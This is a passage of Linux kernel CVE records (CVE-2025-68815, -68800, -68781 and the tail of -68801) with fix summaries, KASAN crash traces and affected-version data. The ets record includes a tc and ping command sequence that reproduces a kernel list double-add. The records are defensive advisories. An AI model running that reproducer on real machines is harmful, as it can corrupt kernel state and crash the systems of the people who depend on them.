kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:13.200Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a2dfe6758fc63e542105bee8b17a3a7485684db0"
},
{
"url": "https://git.kernel.org/stable/c/9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc"
},
{
"url": "https://git.kernel.org/stable/c/c437fbfd4382412598cdda1f8e2881b523668cc2"
},
{
"url": "https://git.kernel.org/stable/c/4a3c569005f42ab5e5b2ad637132a33bf102cc08"
},
{
"url": "https://git.kernel.org/stable/c/ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a"
},
{
"url": "https://git.kernel.org/stable/c/675c5aeadf6472672c472dc0f26401e4fcfbf254"
},
{
"url": "https://git.kernel.org/stable/c/8b0e69763ef948fb872a7767df4be665d18f5fd4"
}
],
"title": "mlxsw: spectrum_router: Fix neighbour use-after-free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68801",
"datePublished": "2026-01-13T15:29:10.349Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:13.200Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68815 (GCVE-0-2025-68815)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
net/sched: ets: Remove drr class from the active list if it changes to strict
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: Remove drr class from the active list if it changes to strict
Whenever a user issues an ets qdisc change command, transforming a
drr class into a strict one, the ets code isn't checking whether that
class was in the active list and removing it. This means that, if a
user changes a strict class (which was in the active list) back to a drr
one, that class will be added twice to the active list [1].
Doing so with the following commands:
tc qdisc add dev lo root handle 1: ets bands 2 strict 1
tc qdisc add dev lo parent 1:2 handle 20: \
tbf rate 8bit burst 100b latency 1s
tc filter add dev lo parent 1: basic classid 1:2
ping -c1 -W0.01 -s 56 127.0.0.1
tc qdisc change dev lo root handle 1: ets bands 2 strict 2
tc qdisc change dev lo root handle 1: ets bands 2 strict 1
ping -c1 -W0.01 -s 56 127.0.0.1
Will trigger the following splat with list debug turned on:
[ 59.279014][ T365] ------------[ cut here ]------------
[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.
[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220
[ 59.280860][ T365] Modules linked in:
[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)
[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220
[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 <0f> 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44
...
[ 59.288812][ T365] Call Trace:
[ 59.289056][ T365] <TASK>
[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80
[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0
[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10
[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240
[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10
[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110
[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0
Fix this by always checking and removing an ets class from the active list
when changing it to strict.
[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: f517335a61ff8037b18ba1b0a002c1f82926a934 , < 58fdce6bc005e964f1dbc3ca716f5fe0f68839a2 (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87 (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 8067db5c95aab9461d23117679338cd8869831fa (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 2f125ebe47d6369e562f3cbd9b6227cff51eaf34 (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < cca2ed931b734fe48139bc6f020e47367346630f (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 43d9a530c8c094d137159784e7c951c65f11ec6c (git) |
| Linux | Linux | Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < b1e125ae425aba9b45252e933ca8df52a843ec70 (git) |
| Linux | Linux | Affected: d05330672afe2e142ba97e63bd7c1faef76781bb (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "58fdce6bc005e964f1dbc3ca716f5fe0f68839a2",
"status": "affected",
"version": "f517335a61ff8037b18ba1b0a002c1f82926a934",
"versionType": "git"
},
{
"lessThan": "02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "8067db5c95aab9461d23117679338cd8869831fa",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "2f125ebe47d6369e562f3cbd9b6227cff51eaf34",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "cca2ed931b734fe48139bc6f020e47367346630f",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "43d9a530c8c094d137159784e7c951c65f11ec6c",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "b1e125ae425aba9b45252e933ca8df52a843ec70",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"status": "affected",
"version": "d05330672afe2e142ba97e63bd7c1faef76781bb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.62",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:20.257Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/58fdce6bc005e964f1dbc3ca716f5fe0f68839a2"
},
{
"url": "https://git.kernel.org/stable/c/02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87"
},
{
"url": "https://git.kernel.org/stable/c/8067db5c95aab9461d23117679338cd8869831fa"
},
{
"url": "https://git.kernel.org/stable/c/2f125ebe47d6369e562f3cbd9b6227cff51eaf34"
},
{
"url": "https://git.kernel.org/stable/c/cca2ed931b734fe48139bc6f020e47367346630f"
},
{
"url": "https://git.kernel.org/stable/c/43d9a530c8c094d137159784e7c951c65f11ec6c"
},
{
"url": "https://git.kernel.org/stable/c/b1e125ae425aba9b45252e933ca8df52a843ec70"
}
],
"title": "net/sched: ets: Remove drr class from the active list if it changes to strict",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68815",
"datePublished": "2026-01-13T15:29:19.789Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:20.257Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68800 (GCVE-0-2025-68800)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats
Cited commit added a dedicated mutex (instead of RTNL) to protect the
multicast route list, so that it will not change while the driver
periodically traverses it in order to update the kernel about multicast
route stats that were queried from the device.
One instance of list entry deletion (during route replace) was missed
and it can result in a use-after-free [1].
Fix by acquiring the mutex before deleting the entry from the list and
releasing it afterwards.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]
Read of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043
CPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)
Hardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017
Workqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]
Call Trace:
<TASK>
dump_stack_lvl+0xba/0x110
print_report+0x174/0x4f5
kasan_report+0xdf/0x110
mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 29933:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x8f/0xa0
mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]
mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
Freed by task 29933:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_save_free_info+0x3b/0x70
__kasan_slab_free+0x43/0x70
kfree+0x14e/0x700
mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]
mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < b957366f5611bbaba03dd10ef861283347ddcc88 (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 6e367c361a523a4b54fe618215c64a0ee189caf0 (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73 (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 5f2831fc593c2b2efbff7dd0dd7441cec76adcd5 (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 216afc198484fde110ebeafc017992266f4596ce (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 4049a6ace209f4ed150429f86ae796d7d6a4c22b (git) |
| Linux | Linux | Affected: f38656d067257cc43b652958dd154e1ab0773701, < 8ac1dacec458f55f871f7153242ed6ab60373b90 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b957366f5611bbaba03dd10ef861283347ddcc88",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "6e367c361a523a4b54fe618215c64a0ee189caf0",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "5f2831fc593c2b2efbff7dd0dd7441cec76adcd5",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "216afc198484fde110ebeafc017992266f4596ce",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "4049a6ace209f4ed150429f86ae796d7d6a4c22b",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "8ac1dacec458f55f871f7153242ed6ab60373b90",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:11.928Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b957366f5611bbaba03dd10ef861283347ddcc88"
},
{
"url": "https://git.kernel.org/stable/c/6e367c361a523a4b54fe618215c64a0ee189caf0"
},
{
"url": "https://git.kernel.org/stable/c/37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73"
},
{
"url": "https://git.kernel.org/stable/c/5f2831fc593c2b2efbff7dd0dd7441cec76adcd5"
},
{
"url": "https://git.kernel.org/stable/c/216afc198484fde110ebeafc017992266f4596ce"
},
{
"url": "https://git.kernel.org/stable/c/4049a6ace209f4ed150429f86ae796d7d6a4c22b"
},
{
"url": "https://git.kernel.org/stable/c/8ac1dacec458f55f871f7153242ed6ab60373b90"
}
],
"title": "mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68800",
"datePublished": "2026-01-13T15:29:09.688Z",
"dateReserved": "2025-12-24T10:30:51.044Z",
"dateUpdated": "2026-01-19T12:19:11.928Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68781 (GCVE-0-2025-68781)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
The delayed work item otg_event is initialized in fsl_otg_conf() and
scheduled under two conditions:
1. When a host controller binds to the OTG controller.
2. When the USB ID pin state changes (cable insertion/removal).
A race condition occurs when the device is removed via fsl_otg_remove():
the fsl_otg instance may be freed while the delayed work is still pending
or executing. This leads to use-after-free when the work function
fsl_otg_event() accesses the already freed memory.
The problematic scenario:
(detach thread) | (delayed work)
fsl_otg_remove() |
kfree(fsl_otg_dev) //FREE| fsl_otg_event()
| og = container_of(...) //USE
| og-> //USE
Fix this by calling disable_delayed_work_sync() in fsl_otg_remove()
before deallocating the fsl_otg structure. This ensures the delayed work
is properly canceled and completes execution prior to memory deallocation.
This bug was identified through static analysis.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463, < 4476c73bbbb09b13a962176fca934b32d3954a2e (git) |
| Linux | Linux | Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463, < 319f7a85b3c4e34ac2fe083eb146fe129a556317 (git) |
| Linux | Linux | Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463, < 69f9a0701abc3d1f8225074c56c27e6c16a37222 (git) |
| Linux | Linux | Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463, < 2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23 (git) |
| Linux | Linux | Affected: 0807c500a1a6d7fa20cbd7bbe7fea14a66112463, < 41ca62e3e21e48c2903b3b45e232cf4f2ff7434f (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/phy/phy-fsl-usb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4476c73bbbb09b13a962176fca934b32d3954a2e",
"status": "affected",
"version": "0807c500a1a6d7fa20cbd7bbe7fea14a66112463",
